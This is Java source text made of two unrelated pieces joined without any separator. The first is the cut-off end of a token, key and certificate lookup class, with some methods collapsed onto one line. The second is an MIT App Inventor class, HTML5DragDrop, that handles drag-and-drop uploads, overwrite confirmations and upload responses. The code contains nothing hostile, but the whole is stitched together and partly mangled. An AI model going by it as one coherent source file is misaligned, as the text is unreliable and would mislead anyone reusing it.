            BiFunction<Token, Key, Boolean> tester,
            BiFunction<Token, Key, T> mapper) {
        for (Token token : currentTokens) {
            for (Key key : token.getKeys()) {
                if (tester.apply(token, key)) {
                    return Optional.ofNullable(mapper.apply(token, key));
                }
            }
        }

        return Optional.empty();
    }

    // Returns the mapper's result for the first (key, cert) pair the tester accepts.
    private static <T> Optional<T> forCert(
            BiFunction<Key, Cert, Boolean> tester,
            BiFunction<Key, Cert, T> mapper) {
        for (Token token : currentTokens) {
            for (Key key : token.getKeys()) {
                for (Cert cert : key.getCerts()) {
                    if (tester.apply(key, cert)) {
                        return Optional.ofNullable(mapper.apply(key, cert));
                    }
                }
            }
        }

        return Optional.empty();
    }

    // Returns the mapper's result for the first (key, cert request) pair the tester accepts.
    private static <T> Optional<T> forCertRequest(
            BiFunction<Key, CertRequest, Boolean> tester,
            BiFunction<Key, CertRequest, T> mapper) {
        for (Token token : currentTokens) {
            for (Key key : token.getKeys()) {
                for (CertRequest certReq : key.getCertRequests()) {
                    if (tester.apply(key, certReq)) {
                        return Optional.ofNullable(mapper.apply(key, certReq));
                    }
                }
            }
        }

        return Optional.empty();
    }

    private static Token findToken(String tokenId) {
        log.trace("findToken({})", tokenId);

        return forToken(t -> t.getId().equals(tokenId), t -> t)
                .orElseThrow(() -> tokenNotFound(tokenId));
    }

    private
static Key findKey(String keyId) { log.trace("findKey({})", keyId); return forKey((t, k) -> k.getId().equals(keyId), (t, k) -> k) .orElseThrow(() -> keyNotFound(keyId)); } private static Cert findCert(String certId) { log.trace("findCert({})", certId); return forCert((k, c) -> c.getId().equals(certId), (k, c) -> c) .orElseThrow(() -> certWithIdNotFound(certId)); } private static String getDefaultFriendlyName(TokenType tokenType) { String name = tokenType.getModuleType(); if (tokenType.getSerialNumber() != null) { name += "-" + tokenType.getSerialNumber(); } if (tokenType.getLabel() != null) { name += "-" + tokenType.getLabel(); } if (tokenType.getSlotIndex() != null) { name += "-" + tokenType.getSlotIndex(); } return name; } }
// -*- mode: java; c-basic-offset: 2; -*-
// Copyright 2017-2020 MIT, All rights reserved
// Released under the Apache License, Version 2.0
// http://www.apache.org/licenses/LICENSE-2.0

package com.google.appinventor.client.utils;

import com.google.appinventor.client.ErrorReporter;
import com.google.appinventor.client.Ode;
import com.google.appinventor.client.OdeAsyncCallback;
import com.google.appinventor.client.editor.youngandroid.YaBlocksEditor;
import com.google.appinventor.client.explorer.project.Project;
import com.google.appinventor.client.wizards.ComponentImportWizard.ImportComponentCallback;
import com.google.appinventor.shared.rpc.UploadResponse;
import com.google.appinventor.shared.rpc.project.UserProject;
import com.google.appinventor.shared.rpc.project.youngandroid.YoungAndroidAssetNode;
import com.google.appinventor.shared.rpc.project.youngandroid.YoungAndroidProjectNode;
import com.google.appinventor.shared.storage.StorageUtil;
import com.google.gwt.core.client.GWT;
import com.google.gwt.event.dom.client.ClickEvent;
import com.google.gwt.event.dom.client.ClickHandler;
import com.google.gwt.query.client.builders.JsniBundle;
import com.google.gwt.user.client.Window;
import com.google.gwt.user.client.ui.Button;
import com.google.gwt.user.client.ui.DialogBox;
import com.google.gwt.user.client.ui.DockPanel;
import com.google.gwt.user.client.ui.Label;
import com.google.gwt.user.client.ui.VerticalPanel;
import jsinterop.annotations.JsFunction;

import static com.google.appinventor.client.Ode.MESSAGES;

/**
 * HTML5DragDrop implements support for dragging projects/extensions/assets from the developer's
 * computer into the browser and dropping them onto the workspace. Depending on the extension of
 * the file, one of uploadProject(), uploadExtension(), or uploadMedia() is called to trigger an
 * import of the dropped entity.
 *
 * Compatibility
 * -------------
 *
 * According to Mozilla, HTML5 Drag and Drop support is available starting in the following
 * browser versions:
 *
 * Chrome: 4
 * Edge: (always)
 * Firefox: 3.5
 * IE: 10
 * Opera: 12
 * Safari: 3.1
 */
public final class HTML5DragDrop {

  /** Injects html5dnd.js, which implements the browser-side drag/drop event handling. */
  interface HTML5DragDropSupport extends JsniBundle {
    @LibrarySource("html5dnd.js")
    void init();
  }

  /** JS-callable continuation used to resume an upload after the user confirms an overwrite. */
  @JsFunction
  public interface ConfirmCallback {
    void run();
  }

  /** Entry point: loads the drag-and-drop script, then publishes the GWT callbacks it needs. */
  public static void init() {
    ((HTML5DragDropSupport) GWT.create(HTML5DragDropSupport.class)).init();
    initJsni();
  }

  // Exposes the static methods below on the top window so that html5dnd.js
  // (plain JavaScript) can call back into GWT-compiled code via $entry.
  private static native void initJsni()/*-{
    top.HTML5DragDrop_isProjectEditorOpen = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::isProjectEditorOpen());
    top.HTML5DragDrop_getOpenProjectId = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::getOpenProjectId());
    top.HTML5DragDrop_handleUploadResponse = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::handleUploadResponse(*));
    top.HTML5DragDrop_reportError = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::reportError(*));
    top.HTML5DragDrop_confirmOverwriteKey = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::confirmOverwriteKey(*));
    top.HTML5DragDrop_confirmOverwriteAsset = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::confirmOverwriteAsset(*));
    top.HTML5DragDrop_isBlocksEditorOpen = $entry(@com.google.appinventor.client.utils.HTML5DragDrop::isBlocksEditorOpen());
  }-*/;

  /** Returns true when the project editor view is frontmost. */
  public static boolean isProjectEditorOpen() {
    // NOTE(review): 0 appears to be the designer/project-editor view id --
    // confirm against Ode's view constants.
    return Ode.getInstance().getCurrentView() == 0;
  }

  /** Returns true when the current file editor is the blocks editor. */
  public static boolean isBlocksEditorOpen() {
    return isProjectEditorOpen()
        && Ode.getInstance().getCurrentFileEditor() instanceof YaBlocksEditor;
  }

  /** Returns the currently open project id as a string (for consumption by JS). */
  public static String getOpenProjectId() {
    return Long.toString(Ode.getInstance().getCurrentYoungAndroidProjectId());
  }

  // Called from JS with a numeric error code. Codes 1 and 2 are
  // drop-validation errors raised by html5dnd.js; any other value is
  // surfaced as an unexpected HTTP status from the upload request.
  protected static void reportError(int errorCode) {
    switch (errorCode) {
      case 1:
        Window.alert("No project open to receive upload.");
        break;
      case 2:
        Window.alert("Uploading of APK files is not supported.");
        break;
      default:
        Window.alert("Unexpected HTTP error code: " + errorCode);
    }
  }

  // Asks the user to confirm overwriting their keystore before a keystore
  // upload proceeds. If no keystore file exists yet, the callback runs
  // immediately; otherwise it runs only after the user picks "overwrite"
  // in a modal dialog. On RPC failure, OdeAsyncCallback reports
  // MESSAGES.uploadKeystoreError() and the callback is never run.
  protected static void confirmOverwriteKey(final ConfirmCallback callback) {
    Ode.getInstance().getUserInfoService().hasUserFile(StorageUtil.ANDROID_KEYSTORE_FILENAME,
        new OdeAsyncCallback<Boolean>(MESSAGES.uploadKeystoreError()) {
          @Override
          public void onSuccess(Boolean keystoreFileExists) {
            if (keystoreFileExists) {
              // Modal (auto-hide disabled) confirmation dialog.
              final DialogBox dialog = new DialogBox(false, true);
              dialog.setStylePrimaryName("ode-DialogBox");
              dialog.setText("Confirm Overwrite...");
              Button cancelButton = new Button(MESSAGES.cancelButton());
              Button deleteButton = new Button(MESSAGES.overwriteButton());
              DockPanel buttonPanel = new DockPanel();
              buttonPanel.add(cancelButton, DockPanel.WEST);
              buttonPanel.add(deleteButton, DockPanel.EAST);
              VerticalPanel panel = new VerticalPanel();
              Label label = new Label();
              label.setText(MESSAGES.confirmOverwriteKeystore());
              panel.add(label);
              panel.add(buttonPanel);
              dialog.add(panel);
              cancelButton.addClickHandler(new ClickHandler() {
                @Override
                public void onClick(ClickEvent event) {
                  // Cancel: dismiss without invoking the callback.
                  dialog.hide();
                }
              });
              deleteButton.addClickHandler(new ClickHandler() {
                @Override
                public void onClick(ClickEvent event) {
                  // Overwrite confirmed: continue the upload.
                  dialog.hide();
                  callback.run();
                }
              });
              dialog.center();
              dialog.show();
            } else {
              // Nothing to overwrite; proceed directly.
              callback.run();
            }
          }
        });
  }

  // Asks the user to confirm overwriting an existing project asset of the
  // same name. Runs the callback immediately when no clash exists, or when
  // the user accepts the overwrite; does nothing when the project is not open.
  protected static void confirmOverwriteAsset(String _projectId, String name,
      final ConfirmCallback callback) {
    // Get the target project
    long projectId = Long.parseLong(_projectId);
    Project project = Ode.getInstance().getProjectManager().getProject(projectId);
    if (project == null) {
      // Project not open so we have nothing to do.
      return;
    }

    // Check if an asset already exists with the given name
    YoungAndroidProjectNode projectNode = (YoungAndroidProjectNode) project.getRootNode();
    YoungAndroidAssetNode node =
        (YoungAndroidAssetNode) projectNode.getAssetsFolder().findNode("assets/" + name);
    if (node == null) {
      // No asset exists by that name so it is safe to upload.
      callback.run();
      return;
    }

    // Ask user to confirm overwriting the asset
    // This currently uses the same mechanism as FileUploadWizard, but should be rewritten to use a
    // dialog at some point.
    // NOTE(review): confirmOverwrite is passed `name` for both arguments --
    // verify the message template really expects the same value twice.
    if (Window.confirm(MESSAGES.confirmOverwrite(name, name))) {
      callback.run();
    }
  }

  // Called from JS with the raw HTTP response body of an upload. Parses the
  // embedded UploadResponse and dispatches on the upload `type`
  // ("project" | "extension" | "asset" | "keystore") to finish the import.
  protected static void handleUploadResponse(String _projectId, String type, String name,
      String body) {
    Ode ode = Ode.getInstance();
    UploadResponse response = UploadResponse.extractUploadResponse(body);
    if (response != null) {
      switch (response.getStatus()) {
        case SUCCESS:
          ErrorReporter.hide();
          if ("project".equals(type)) {
            // Register the imported project and open it in the designer.
            String info = response.getInfo();
            UserProject userProject = UserProject.valueOf(info);
            Project uploadedProject = ode.getProjectManager().addProject(userProject);
            ode.openYoungAndroidProjectInDesigner(uploadedProject);
          } else if ("extension".equals(type)) {
            // Import the extension component into the target project's assets.
            long projectId = Long.parseLong(_projectId);
            YoungAndroidProjectNode projectNode = (YoungAndroidProjectNode) ode.getProjectManager()
                .getProject(projectId).getRootNode();
            ode.getComponentService().importComponentToProject(response.getInfo(), projectId,
                projectNode.getAssetsFolder().getFileId(), new ImportComponentCallback());
          } else if ("asset".equals(type)) {
            // Record the new asset node in the project tree and bump the
            // project's modification date.
            long projectId = Long.parseLong(_projectId);
            ode.updateModificationDate(projectId, response.getModificationDate());
            Project project = ode.getProjectManager().getProject(projectId);
            YoungAndroidProjectNode projectNode = (YoungAndroidProjectNode) project.getRootNode();
            YoungAndroidAssetNode node = new YoungAndroidAssetNode(name,
                projectNode.getAssetsFolder().getFileId() + "/" + name);
            project.addNode(projectNode.getAssetsFolder(), node);
          } else if ("keystore".equals(type)) {
            // Keystore replaced: refresh the toolbar's keystore-dependent buttons.
            Ode.getInstance().getTopToolbar().updateKeystoreFileMenuButtons();
          }
          break;
        case FILE_TOO_LARGE:
          ErrorReporter.reportInfo(MESSAGES.fileTooLargeError());
          break;
        case NOT_PROJECT_ARCHIVE:
          ErrorReporter.reportInfo(MESSAGES.notProjectArchiveError());
          break;
        default:
          ErrorReporter.reportError(MESSAGES.fileUploadError());
      }
    } else {
      // Response body did not contain a parseable UploadResponse.
      ErrorReporter.reportError(MESSAGES.fileUploadError());
    }
  }
}